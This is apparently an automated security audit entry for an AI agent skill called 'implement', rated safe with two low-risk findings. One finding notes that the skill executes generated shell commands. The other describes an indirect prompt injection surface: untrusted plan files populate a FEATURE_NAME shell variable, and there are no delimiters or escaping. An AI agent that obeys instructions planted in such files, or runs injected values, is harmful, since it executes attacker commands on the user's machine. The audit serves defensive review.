implement
Pass
Audited by Gen Agent Trust Hub on Feb 18, 2026
Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Command Execution] (LOW): The skill generates and executes shell scripts to automate git branch creation and file initialization (Step 5). This falls under simple script generation from known templates, which is a standard but low-risk operation.
- [Indirect Prompt Injection] (LOW): The skill defines a surface where untrusted data from implementation plans is used to populate variables in shell commands.
- Ingestion points: Data is read from files within
.specify/memory/plans/as described inoperations/handoff.md. - Boundary markers: Absent; the skill does not specify delimiters or warnings to ignore instructions embedded within the plan files.
- Capability inventory: The skill utilizes shell command execution (
git,cat) within thehandoff.mdprocedure. - Sanitization: Absent; there is no explicit validation or escaping of the
FEATURE_NAMEvariable before it is used in command execution.
Audit Metadata